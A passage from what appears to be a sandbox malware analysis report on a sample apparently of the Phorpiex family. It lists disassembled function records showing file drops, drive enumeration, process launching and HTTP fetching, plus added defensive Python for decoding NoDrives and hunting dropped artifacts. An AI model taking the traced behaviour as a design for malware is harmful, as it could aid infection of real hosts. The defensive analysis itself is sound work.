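    SAMPLE = {"C:\\": ("Windows", 256 * GIB),
              "D:\\": ("", 500_107_862_016),
              "E:\\": ("BACKUP", 2 * 1024 * GIB)}
    print(build_report(SAMPLE, nodrives_mask=0b100))
```

The NoDrives bit layout is the documented Explorer policy format (A: = bit 0, B: = bit 1, and so on), so the same decoder is useful when reviewing that value on a suspect host, whether or not the sample honours it.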

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 281 40f240-40f27f CreateFileW 282 40f285-40f2a0 CreateFileMappingW 281->282 283 40f39a-40f39e 281->283 284 40f390-40f394 CloseHandle 282->284 285 40f2a6-40f2bf MapViewOfFile 282->285 286 40f3a0-40f3c0 CreateFileW 283->286 287 40f3f4-40f3fa 283->287 284->283 288 40f2c5-40f2db GetFileSize 285->288 289 40f386-40f38a CloseHandle 285->289 290 40f3c2-40f3e2 WriteFile CloseHandle 286->290 291 40f3e8-40f3ec call 40ab60 286->291 292 40f2e1-40f2f4 call 40d1a0 288->292 293 40f37c-40f380 UnmapViewOfFile 288->293 289->284 290->291 296 40f3f1 291->296 292->293 298 40f2fa-40f309 292->298 293->289 296->287 298->293 299 40f30b-40f32b call 40cb40 298->299 301 40f330-40f33a 299->301 301->293 302 40f33c-40f367 call 40ae90 memcmp 301->302 302->293 305 40f369-40f375 call 40ab60 302->305 305->293
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                    • memcmp.NTDLL ref: 0040F35D
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902698870-0
                                                                                                                                    • Opcode ID: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
                                                                                                                                    • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                    • Opcode Fuzzy Hash: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
                                                                                                                                    • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 332 40dd50-40dd80 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 333 40dd86-40dd9a InterlockedExchangeAdd 332->333 334 40de69-40de80 GetCurrentThread SetThreadPriority 332->334 333->334 335 40dda0-40dda9 333->335 336 40ddac-40ddb3 335->336 336->334 337 40ddb9-40ddd4 EnterCriticalSection 336->337 338 40dddf-40dde7 337->338 339 40de27-40de3c LeaveCriticalSection 338->339 340 40dde9-40ddf6 338->340 343 40de47-40de4d 339->343 344 40de3e-40de45 339->344 341 40de03-40de25 WaitForSingleObject 340->341 342 40ddf8-40de01 340->342 345 40ddd6-40dddc 341->345 342->345 346 40de5c-40de64 Sleep 343->346 347 40de4f-40de58 343->347 344->334 345->338 346->336 347->346 348 40de5a 347->348 348->334
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02DE0638,000000FF), ref: 0040DD5D
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02DE0638,000000FF), ref: 0040DD6F
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtnds.dat, xrefs: 0040BCC8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                    • String ID: C:\Users\user\tbtnds.dat
                                                                                                                                    • API String ID: 439099756-3213863656
                                                                                                                                    • Opcode ID: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
                                                                                                                                    • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                    • Opcode Fuzzy Hash: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
                                                                                                                                    • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
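Added worked example (not code from the Joe Sandbox report or from the sample). The function records above name three on-disk artifacts: C:\Windows\sysppvrdnvs.exe, the path formatted by the drive-enumeration thread, and the per-profile files C:\Users\user\tbtnds.dat and C:\Users\user\tbtcmds.dat that the two file-mapping routines open read-only (GENERIC_READ, OPEN_EXISTING) and map with PAGE_READONLY / FILE_MAP_READ. "user" is the sandbox account, so a hunt has to look in every profile. The Python below checks a filesystem root for those paths and hashes what it finds so a dropped executable can be tied to the analysed sample; `root` stands in for a live system volume or a mounted image, the demo tree is constructed, and the NoDrives registry value is out of scope because it needs a hive parser.

```python
"""
Added example, not code from the Joe Sandbox report or from the sample.

Offline hunt for the file artifacts named in the function records:
Windows\\sysppvrdnvs.exe and, in every profile under Users, tbtnds.dat and
tbtcmds.dat.  Paths are relative to `root` so the same code runs against a
real system volume, a mounted image, or the constructed demo tree below.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

WINDOWS_ARTIFACTS = ("Windows/sysppvrdnvs.exe",)
PROFILE_ARTIFACTS = ("tbtnds.dat", "tbtcmds.dat")


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hunt(root: Path, known_sha256: set[str] | None = None) -> list[dict[str, object]]:
    """One record per artifact found under `root`.  `known_sha256` carries the
    hashes from the report (or your own triage) so a dropped executable is
    tied to an analysed sample instead of a same-named decoy."""
    known = {h.lower() for h in (known_sha256 or set())}
    hits: list[dict[str, object]] = []

    def record(path: Path, kind: str) -> None:
        digest = sha256_of(path)
        hits.append({"path": str(path), "kind": kind, "sha256": digest,
                     "matches_known_sample": digest in known})

    for rel in WINDOWS_ARTIFACTS:
        candidate = root / rel
        if candidate.is_file():
            record(candidate, "dropped_pe")

    users = root / "Users"
    if users.is_dir():
        for profile in sorted(d for d in users.iterdir() if d.is_dir()):
            for name in PROFILE_ARTIFACTS:
                candidate = profile / name
                if candidate.is_file():
                    record(candidate, "data_file")
    return hits


def run_demo() -> list[dict[str, object]]:
    """Plant constructed artifacts (placeholder bytes, not sample content) in
    a temporary tree and hunt them; used by the stand-alone run and tests."""
    root = Path(tempfile.mkdtemp(prefix="phorpiex_hunt_"))
    (root / "Windows").mkdir()
    (root / "Users" / "alice").mkdir(parents=True)
    (root / "Users" / "bob").mkdir()
    fake_pe = b"MZ" + b"\x00" * 62  # constructed stand-in, not the sample
    (root / "Windows" / "sysppvrdnvs.exe").write_bytes(fake_pe)
    (root / "Users" / "alice" / "tbtnds.dat").write_bytes(b"constructed")
    (root / "Users" / "bob" / "tbtcmds.dat").write_bytes(b"constructed")
    # Pretend the planted PE is the analysed sample by feeding its own hash.
    return hunt(root, known_sha256={hashlib.sha256(fake_pe).hexdigest()})


if __name__ == "__main__":
    for hit in run_demo():
        print(hit)
```

On a live host, run it against the system drive with the SHA256 values from the report header as `known_sha256`; a hit on sysppvrdnvs.exe that does not match is still worth pulling, since the file-mapping routine at 0040F240 above rewrites the file it compares, so the on-disk copy may be a newer build.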

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 377 405c00-405c32 InitializeCriticalSection CreateFileW 378 405d25-405d28 377->378 379 405c38-405c53 CreateFileMappingW 377->379 380 405c59-405c72 MapViewOfFile 379->380 381 405d1b-405d1f CloseHandle 379->381 382 405d11-405d15 CloseHandle 380->382 383 405c78-405c8a GetFileSize 380->383 381->378 382->381 384 405c8d-405c91 383->384 385 405c93-405c9a 384->385 386 405d07-405d0b UnmapViewOfFile 384->386 387 405c9c 385->387 388 405c9e-405cb1 call 40d1d0 385->388 386->382 387->386 391 405cb3 388->391 392 405cb5-405cca 388->392 391->386 393 405cda-405d05 call 405d30 392->393 394 405ccc-405cd8 call 40ab60 392->394 393->384 394->386
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtcmds.dat, xrefs: 00405C20
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat
                                                                                                                                    • API String ID: 3956458805-1042172597
                                                                                                                                    • Opcode ID: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
                                                                                                                                    • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                    • Opcode Fuzzy Hash: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
                                                                                                                                    • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

Control-flow Graph (rendered graph not captured; function 40f400-40f4ab)
APIs
• memset.NTDLL ref: 0040F40E
• memset.NTDLL ref: 0040F41E
• CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
• Sleep.KERNEL32(000003E8), ref: 0040F467
• ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
• Sleep.KERNEL32(000003E8), ref: 0040F49C
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: Sleepmemset$CreateExecuteProcessShell
• String ID: $D$open
• API String ID: 3787208655-2182757814
• Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
• Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
• Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
• Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

Control-flow Graph (rendered graph not captured; function 4060a0-4062f4)
APIs
• EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
• memcpy.NTDLL(?,00000000,00000100), ref: 00406141
• CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
• FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
• CloseHandle.KERNEL32(000000FF), ref: 004062DD
• LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
Strings
• C:\Users\user\tbtcmds.dat, xrefs: 00406260
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
• String ID: C:\Users\user\tbtcmds.dat
• API String ID: 1457358591-1042172597
• Opcode ID: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
• Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
• Opcode Fuzzy Hash: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
• Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9

Control-flow Graph (rendered graph not captured; function 40e310-40e3fd)
APIs
• recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
• Sleep.KERNEL32(000003E8), ref: 0040E36E
• StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
• StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
• StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: Sleeprecvfrom
• String ID: HTTP/1.1 200 OK$LOCATION:
• API String ID: 668330359-3973262388
• Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
• Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
• Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
• Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
APIs
• InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
• HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
• InternetCloseHandle.WININET(00000000), ref: 0040F538
• InternetCloseHandle.WININET(00000000), ref: 0040F542
• Sleep.KERNEL32(000003E8), ref: 0040F54D
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
• API String ID: 2743515581-2960703779
• Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
• Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
• Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
• Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
APIs
• CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
• WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
• FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
• CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
• InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
Strings
• C:\Users\user\tbtnds.dat, xrefs: 0040B5C3
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Similarity
• API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
• String ID: C:\Users\user\tbtnds.dat
• API String ID: 442028454-3213863656
• Opcode ID: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
• Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
• Opcode Fuzzy Hash: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
• Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
